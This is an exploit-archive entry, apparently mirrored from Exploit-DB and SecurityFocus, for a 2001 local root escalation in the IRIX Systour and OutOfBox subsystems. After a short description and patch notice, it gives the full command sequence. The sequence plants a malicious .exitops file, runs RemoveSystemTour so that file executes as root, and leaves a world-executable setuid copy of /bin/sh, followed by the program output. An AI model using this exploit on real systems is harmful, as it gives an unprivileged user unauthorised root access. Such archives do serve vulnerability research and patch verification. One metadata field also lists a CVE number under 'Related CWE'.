Systour and OutOfBox Subsystems Privilege Escalation

vendor:

IRIX

by:

SecurityFocus

8.8

CVSS

HIGH

Systour and OutOfBox Subsystems Privilege Escalation

264

CWE

Product Name: IRIX

Affected Version From: IRIX 5.x

Affected Version To: IRIX 6.x

Patch Exists: YES

Related CWE: CVE-2001-0206

CPE: o:sgi:irix

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2001

Systour and OutOfBox Subsystems Privilege Escalation

A vulnerability exists in both the Systour and OutOfBox susbsystems included with new installs of IRIX 5.x and 6.x from SGI. This vulnerability allows users on the system to run arbitrary commands as root. An attacker can exploit this vulnerability by creating a malicious .exitops file in the $HOME/var/inst directory and then running the RemoveSystemTour command. This will execute the malicious .exitops file as root, allowing the attacker to gain root privileges.

Mitigation:

SGI has released a patch to address this vulnerability.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/470/info

A vulnerability exists in both the Systour and OutOfBox susbsystems included with new installs of IRIX 5.x and 6.x from SGI. This vulnerability allows users on the system to run arbitrary commands as root. 

$ rbase=$HOME; export rbase
$ mkdir -p $HOME/var/inst
$ echo "dryrun: true" > $HOME/.swmgrrc
$ cp -p /bin/sh /tmp/foobar
$ printf '#\!/bin/sh\nchmod 4777 /tmp/foobar\n' > $HOME/var/inst/.exitops
$ chmod a+x $HOME/var/inst/.exitops
$ /usr/lib/tour/bin/RemoveSystemTour
Executing outstanding exit-commands from previous session ..
Successfully completed exit-commands from previous session.
Reading installation history
Checking dependencies
ERROR : Software Manager: automatic installation failed: New
target (nothing installed) and no distribution.